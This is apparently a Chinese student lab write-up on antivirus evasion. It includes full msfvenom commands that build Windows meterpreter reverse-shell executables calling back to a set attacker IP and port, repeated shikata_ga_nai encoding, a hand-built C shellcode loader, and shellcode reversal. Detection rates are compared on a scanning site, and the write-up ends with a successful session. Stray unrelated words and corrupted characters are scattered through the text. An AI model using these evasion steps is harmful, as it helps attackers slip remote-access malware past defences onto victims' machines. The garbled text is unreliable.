(1)杀软是如何检测出恶意代码的?
答:经过三种方式查杀恶意代码,①基于特征码:检测一段代码;②启发式检测:解决单一的特征码对比的缺陷;③基于行为的恶意代码:监控修改文件硬盘、连网链接恶意网站等。
(2)免杀是作什么?
答:就是不让杀毒软件查出来的厉害病毒。
(3)免杀的基本方法有哪些?
答:①基于特征码:对于有.exe能够加压缩壳;对于shellcode能够用encode编码,对于奇偶位进行分别异或;②能够本身手动编写一个恶意软件;③对于攻击行为:反弹式连接;使用隧道技术。python
在kali中生成meterpreter的可执行文件sos.exe,使用ncat传输至主机。(上次实验传过来的我还没删~就不演示了。)
shell
使用http://www.virscan.org/网站监测杀软查杀病毒的能力。(注意这里上传的文件不能够以中文及数字开头哦)
编程
感受我这个不是特别毒,才46%,但这明明就是一个裸毒啊!反正说没有病毒的杀毒软件应该都是假的了。windows
仅一次编码
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST=192.168.228.128 LPORT=5238 -f exe > ms1.exe
数组
屡次编码尝试
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.228.128 LPORT=5238 -f exe > ms2.exe
安全
再来看看检查结果(结果仍是很高,没错说明不少杀毒软件对于编码病毒识别较高)
网络
对比两次咱们还发现这三次生成的可执行文件的大小都是同样的,只有payload的大小会增长。可能这样不容易被发现。tcp
use python/meterpreter/rev_tcp
set LHOST kali的IP
generate
5238sos.exe
找不到位置怎么办cp 复制路径 ~/你能找到的文件夹
函数
来看看检测结果(效果仍是很是明显的,还有百分之25的杀软检测出来了)
网站
(手工打造病毒)(不是特别手工)
使用命令生成一个c语言格式的Shellcode数组
*此内容已被删除
vi建立一个C文件,mssc5238.c,将数组写入文件中,加上主函数。
*此处省略好多字
使用命令该C语言代码mssc5238.c转换为一个可在64位windows系统下操做的可执行文件mssc5238.exe
检查一下,有8个杀毒软件检测出病毒,是如今作的病毒中最不容易被检测的一个了。
采用逆序修改shellcode
检测一下(很不错只有四款软件检查出了错误)
使用金山毒霸扫描一下,也成功躲过
kali中msf成功,获取权限